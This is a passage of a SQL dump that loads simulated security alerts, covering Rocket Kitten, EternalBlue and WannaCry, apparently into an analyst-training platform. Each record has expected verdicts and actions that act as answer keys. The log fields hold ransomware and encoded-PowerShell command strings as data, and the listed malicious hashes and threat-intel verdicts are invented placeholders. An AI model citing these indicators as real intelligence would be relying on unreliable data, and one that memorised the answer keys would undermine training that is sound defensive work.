1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T03:45:12Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"172.16.254.1\\\",\\\"destination_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"registry_change\\\":{\\\"key_path\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"GholeeUpdater\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\Gholee\\\\\\\\gholee_updater.exe\\\"},\\\"scheduled_task\\\":{\\\"name\\\":\\\"Gholee Persistence Task\\\",\\\"task_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\Gholee\\\\\\\\task.xml\\\",\\\"creator_user\\\":\\\"compromised_user\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"external_ip\\\":\\\"198.51.100.14\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.118Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T03:45:12Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"172.16.254.1\\\",\\\"destination_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"registry_change\\\":{\\\"key_path\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"GholeeUpdater\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\Gholee\\\\\\\\gholee_updater.exe\\\"},\\\"scheduled_task\\\":{\\\"name\\\":\\\"Gholee Persistence Task\\\",\\\"task_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\Gholee\\\\\\\\task.xml\\\",\\\"creator_user\\\":\\\"compromised_user\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"external_ip\\\":\\\"198.51.100.14\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.118Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T03:45:12Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"172.16.254.1\\\",\\\"destination_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"registry_change\\\":{\\\"key_path\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"GholeeUpdater\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\Gholee\\\\\\\\gholee_updater.exe\\\"},\\\"scheduled_task\\\":{\\\"name\\\":\\\"Gholee Persistence Task\\\",\\\"task_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\Gholee\\\\\\\\task.xml\\\",\\\"creator_user\\\":\\\"compromised_user\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"external_ip\\\":\\\"198.51.100.14\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.118Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T03:45:12Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"172.16.254.1\\\",\\\"destination_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"registry_change\\\":{\\\"key_path\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"GholeeUpdater\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\Gholee\\\\\\\\gholee_updater.exe\\\"},\\\"scheduled_task\\\":{\\\"name\\\":\\\"Gholee Persistence Task\\\",\\\"task_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\Gholee\\\\\\\\task.xml\\\",\\\"creator_user\\\":\\\"compromised_user\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"external_ip\\\":\\\"198.51.100.14\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(505, 'Lateral Movement Detected Across Network', 'high', 'Network Traffic Analysis', 'With persistence established, Rocket Kitten moves laterally, probing for additional systems to compromise within the aerospace firm\'s network.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:45:30Z\",\"source_ip\":\"192.168.1.100\",\"destination_ip\":\"10.20.30.40\",\"attacker_ip\":\"203.0.113.50\",\"username\":\"jdoe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"filename\":\"RocketKittenTool.exe\",\"event\":\"Lateral Movement Detected\",\"protocol\":\"SMB\",\"description\":\"Suspicious SMB traffic detected from 192.168.1.100 to 10.20.30.40 using compromised credentials.\",\"malware_family\":\"Rocket Kitten\",\"action_taken\":\"Traffic flagged for further analysis\"}', '2026-01-06 01:24:23', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Rocket Kitten APT group.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash identified as Rocket Kitten tool.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"RocketKittenTool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_repository\",\"verdict\":\"malicious\",\"details\":\"File associated with Rocket Kitten operations.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_database\",\"verdict\":\"suspicious\",\"details\":\"User\'s credentials were used in a suspicious manner.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(506, 'Data Exfiltration Attempt Identified', 'high', 'Data Loss Prevention (DLP)', 'During the final stage of the operation, Rocket Kitten attempted to exfiltrate sensitive aerospace data to external servers. This activity was detected by the DLP system, indicating a high likelihood of data theft.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"event_id\":\"DLP-EXFIL-20231015-001\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"detected_file\":\"aerospace_project_plan.pdf\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"protocol\":\"HTTPS\",\"action_taken\":\"Blocked\",\"alert_severity\":\"High\"}', '2026-01-06 01:24:23', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Rocket Kitten\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"aerospace_project_plan.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"DLP System\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document targeted for exfiltration\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"clean\",\"details\":\"No known malicious activity associated with this hash\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"HR Database\",\"verdict\":\"internal\",\"details\":\"Employee account used in exfiltration attempt\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.120Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231015-001\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"detected_file\\\":\\\"aerospace_project_plan.pdf\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action_taken\\\":\\\"Blocked\\\",\\\"alert_severity\\\":\\\"High\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.120Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231015-001\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"detected_file\\\":\\\"aerospace_project_plan.pdf\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action_taken\\\":\\\"Blocked\\\",\\\"alert_severity\\\":\\\"High\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.120Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231015-001\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"detected_file\\\":\\\"aerospace_project_plan.pdf\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action_taken\\\":\\\"Blocked\\\",\\\"alert_severity\\\":\\\"High\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.120Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231015-001\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"detected_file\\\":\\\"aerospace_project_plan.pdf\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action_taken\\\":\\\"Blocked\\\",\\\"alert_severity\\\":\\\"High\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.120Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231015-001\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"detected_file\\\":\\\"aerospace_project_plan.pdf\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action_taken\\\":\\\"Blocked\\\",\\\"alert_severity\\\":\\\"High\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(507, 'Initial Breach Detected via EternalBlue', 'critical', 'Network Intrusion Detection System (NIDS)', 'An advanced attack was detected leveraging the EternalBlue vulnerability to gain unauthorized access to vulnerable systems within the network. The attacker initiated the breach from a known malicious IP address, targeting internal IP addresses, and executed a payload associated with the exploit.', 'Vulnerability Exploitation', 'T1210 - Exploitation of Remote Services', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T07:45:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"event_type\":\"exploit_attempt\",\"vulnerability\":\"EternalBlue\",\"payload_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"detected_by\":\"NIDS\",\"filename\":\"exploit.dll\",\"username\":\"unknown\"}', '2026-01-06 01:34:24', '2026-02-16 18:19:05', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous cyber attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with EternalBlue payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"exploit.dll\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in exploit attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(508, 'Malicious Code Execution Initiated', 'critical', 'Endpoint Detection and Response (EDR)', 'An advanced remote code execution attempt has been detected. The attacker has initiated the WannaCry ransomware payload, beginning the encryption process on compromised systems.', 'Remote Code Execution', 'T1059.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:22:35Z\",\"event_id\":\"edr_456789\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.102\",\"source_port\":443,\"destination_port\":135,\"protocol\":\"TCP\",\"username\":\"compromised_user\",\"executed_command\":\"c:\\\\windows\\\\system32\\\\cmd.exe /c start wannacry.exe\",\"file_hash\":\"3f2efc7f4c0a3b8ff2e8e4d3b6bb6a8f\",\"file_path\":\"C:\\\\Users\\\\compromised_user\\\\Downloads\\\\wannacry.exe\",\"process_id\":12345,\"malware_name\":\"WannaCry\"}', '2026-01-06 01:34:24', '2026-02-16 18:19:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with WannaCry attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Compromised internal host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f2efc7f4c0a3b8ff2e8e4d3b6bb6a8f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches WannaCry ransomware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"wannacry.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal EDR\",\"verdict\":\"malicious\",\"details\":\"Known ransomware payload.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User credentials possibly compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(509, 'Persistence Mechanism Established', 'high', 'System Logs', 'The attacker has established persistence on the compromised systems by modifying registry keys and creating scheduled tasks, ensuring the ransomware re-executes upon reboot.', 'Persistence', 'T1547.001 - Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:25:30Z\",\"event_id\":\"4624\",\"computer_name\":\"compromised-host.local\",\"user\":\"malicious_user\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"registry_key_modified\":\"HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousApp\",\"scheduled_task_created\":\"\\\\Windows\\\\System32\\\\Tasks\\\\MaliciousTask\",\"malware_file\":\"ransomware_payload.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"description\":\"A malicious user has modified the Windows registry to ensure the ransomware payload executes at startup.\"}', '2026-01-06 01:34:24', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Hash matches known ransomware payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Filename commonly associated with ransomware attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.123Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:25:30Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"registry_key_modified\\\":\\\"HKEY_CURRENT_USER\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"scheduled_task_created\\\":\\\"\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\MaliciousTask\\\",\\\"malware_file\\\":\\\"ransomware_payload.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"description\\\":\\\"A malicious user has modified the Windows registry to ensure the ransomware payload executes at startup.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.123Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:25:30Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"registry_key_modified\\\":\\\"HKEY_CURRENT_USER\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"scheduled_task_created\\\":\\\"\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\MaliciousTask\\\",\\\"malware_file\\\":\\\"ransomware_payload.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"description\\\":\\\"A malicious user has modified the Windows registry to ensure the ransomware payload executes at startup.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.123Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:25:30Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"registry_key_modified\\\":\\\"HKEY_CURRENT_USER\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"scheduled_task_created\\\":\\\"\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\MaliciousTask\\\",\\\"malware_file\\\":\\\"ransomware_payload.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"description\\\":\\\"A malicious user has modified the Windows registry to ensure the ransomware payload executes at startup.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.123Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:25:30Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"registry_key_modified\\\":\\\"HKEY_CURRENT_USER\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"scheduled_task_created\\\":\\\"\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\MaliciousTask\\\",\\\"malware_file\\\":\\\"ransomware_payload.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"description\\\":\\\"A malicious user has modified the Windows registry to ensure the ransomware payload executes at startup.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.123Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:25:30Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"registry_key_modified\\\":\\\"HKEY_CURRENT_USER\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"scheduled_task_created\\\":\\\"\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\MaliciousTask\\\",\\\"malware_file\\\":\\\"ransomware_payload.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"description\\\":\\\"A malicious user has modified the Windows registry to ensure the ransomware payload executes at startup.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
